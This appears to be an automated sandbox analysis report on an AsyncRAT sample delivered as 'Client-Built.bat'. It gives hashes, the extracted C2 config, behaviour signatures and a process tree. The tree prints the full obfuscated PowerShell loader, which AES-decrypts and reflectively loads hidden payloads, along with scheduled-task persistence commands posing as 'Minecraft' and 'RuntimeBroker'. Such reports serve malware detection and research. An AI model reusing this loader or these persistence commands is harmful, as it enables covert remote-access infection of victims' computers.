Overview

overview

10

Static

static

1

Client-Built.bat

windows7-x64

8

Client-Built.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    48s
  • max time network
    50s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-10-2024 18:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client-Built.bat

  • Size

    309KB

  • MD5

    779ea367cf71bed6a1f3b78a48d7c3fd

  • SHA1

    a8a6caee309e724367a686ab9da2a65f3522eba0

  • SHA256

    53666bd18a4e85ff72aac790ea41f603e3d0ce78d12a22bfcdb2e46d1f1d4afd

  • SHA512

    8e54f78210ec383fd24e2fe0bc0beb2d0aad0536443fe88e5f8f10959913bd66000d6448219f3137589c707c85a5e3cac3b03d6fb68cc942543ee51f1e5faa94

  • SSDEEP

    6144:L3pboxHrffvx5qjFakMpbeZuwRLfktxH44ScYQafuqzyFhSd90:LxOrfOupiRLQScYLfuDFs90

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

runderscore00-37568.portmap.host:37568

Attributes
  • delay

    3

  • install

    true

  • install_file

    Minecraft.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-Built.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:1664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhQ3heawMyvGHcN/HVfcC9bTWPMTkS0JHj1mcOoLd0g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3EOLjVuYmh+6EyzRS0NrQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXQbB=New-Object System.IO.MemoryStream(,$param_var); $AUvTu=New-Object System.IO.MemoryStream; $tCRmZ=New-Object System.IO.Compression.GZipStream($vXQbB, [IO.Compression.CompressionMode]::Decompress); $tCRmZ.CopyTo($AUvTu); $tCRmZ.Dispose(); $vXQbB.Dispose(); $AUvTu.Dispose(); $AUvTu.ToArray();}function execute_function($param_var,$param2_var){ $oYOpP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FcSFc=$oYOpP.EntryPoint; $FcSFc.Invoke($null, $param2_var);}$lXRaI = 'C:\Users\Admin\AppData\Local\Temp\Client-Built.bat';$host.UI.RawUI.WindowTitle = $lXRaI;$enbFg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lXRaI).Split([Environment]::NewLine);foreach ($huNIz in $enbFg) { if ($huNIz.StartsWith(':: ')) { $GZJMV=$huNIz.Substring(3); break; }}$payloads_var=[string[]]$GZJMV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1932
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_483_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_483.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2396
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_483.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2012
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_483.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3952
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1852
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:2892
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhQ3heawMyvGHcN/HVfcC9bTWPMTkS0JHj1mcOoLd0g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3EOLjVuYmh+6EyzRS0NrQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXQbB=New-Object System.IO.MemoryStream(,$param_var); $AUvTu=New-Object System.IO.MemoryStream; $tCRmZ=New-Object System.IO.Compression.GZipStream($vXQbB, [IO.Compression.CompressionMode]::Decompress); $tCRmZ.CopyTo($AUvTu); $tCRmZ.Dispose(); $vXQbB.Dispose(); $AUvTu.Dispose(); $AUvTu.ToArray();}function execute_function($param_var,$param2_var){ $oYOpP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FcSFc=$oYOpP.EntryPoint; $FcSFc.Invoke($null, $param2_var);}$lXRaI = 'C:\Users\Admin\AppData\Roaming\startup_str_483.bat';$host.UI.RawUI.WindowTitle = $lXRaI;$enbFg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lXRaI).Split([Environment]::NewLine);foreach ($huNIz in $enbFg) { if ($huNIz.StartsWith(':: ')) { $GZJMV=$huNIz.Substring(3); break; }}$payloads_var=[string[]]$GZJMV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1660
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Minecraft" /tr '"C:\Users\Admin\AppData\Roaming\Minecraft.exe"' & exit
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3716
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "Minecraft" /tr '"C:\Users\Admin\AppData\Roaming\Minecraft.exe"'
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3720
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCB8D.tmp.bat""
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2544
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    7⤵
                    • Delays execution with timeout.exe
                    PID:2208
                  • C:\Users\Admin\AppData\Roaming\Minecraft.exe
                    "C:\Users\Admin\AppData\Roaming\Minecraft.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3824

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        1cc5e033811a5d520bb4a6904b5c433b

        SHA1

        c159a342ed372790600b3a6ac97e274638a0ce9a

        SHA256

        9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

        SHA512

        dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f0zpdkmt.tvv.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\tmpCB8D.tmp.bat
        Filesize

        153B

        MD5

        099954b4cde2e5dbd85a265369a906bf

        SHA1

        4e0fcc878f77a82f9d6000679513d025c0ecc4b4

        SHA256

        bb057dcf346d9228f66f55ca0769d0fb58f04d87927b708d912c9614d76c5486

        SHA512

        a00c56a418aed2b160dcb0f519cf70f766d788220b65a633be7ac2cb62b1227107fe61673428afa7ec5d1d60f2e417652b151982e5d833d9fb051e8801eede3a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Minecraft.exe
        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_483.bat
        Filesize

        309KB

        MD5

        779ea367cf71bed6a1f3b78a48d7c3fd

        SHA1

        a8a6caee309e724367a686ab9da2a65f3522eba0

        SHA256

        53666bd18a4e85ff72aac790ea41f603e3d0ce78d12a22bfcdb2e46d1f1d4afd

        SHA512

        8e54f78210ec383fd24e2fe0bc0beb2d0aad0536443fe88e5f8f10959913bd66000d6448219f3137589c707c85a5e3cac3b03d6fb68cc942543ee51f1e5faa94

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_483.vbs
        Filesize

        115B

        MD5

        7d7bdd102c0cb18fe09c62e38bc9c651

        SHA1

        72005e64cdea5ccf472c4c26899e67e68c6c4266

        SHA256

        23591be9bda6ecb5a3763a128661d09fbe0bbe1b51045ff9b085cc881aadfbb5

        SHA512

        cbb568f1d2bdee5b40052e9da0fb2e785f097e62b86d0804f6eb8eb230fd3058cc8057240e837443e9f491e5c5e8b2694ca9731884a2ef98272f9e3e0f4041dc

        Download Submit

      • \??\PIPE\srvsvc
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        Download Submit

      • memory/1660-50-0x000001EECDAC0000-0x000001EECDAE4000-memory.dmp

        Filesize

        144KB

        Download

      • memory/1932-13-0x000001B359040000-0x000001B359048000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1932-14-0x000001B3735E0000-0x000001B37361C000-memory.dmp

        Filesize

        240KB

        Download

      • memory/1932-0-0x00007FFEE5FA3000-0x00007FFEE5FA5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1932-12-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1932-51-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1932-11-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1932-1-0x000001B3712F0000-0x000001B371312000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2396-30-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2396-27-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2396-26-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2396-21-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3824-68-0x000001E6D6A40000-0x000001E6D6A84000-memory.dmp

        Filesize

        272KB

        Download

      • memory/3824-69-0x000001E6D6ED0000-0x000001E6D6F46000-memory.dmp

        Filesize

        472KB

        Download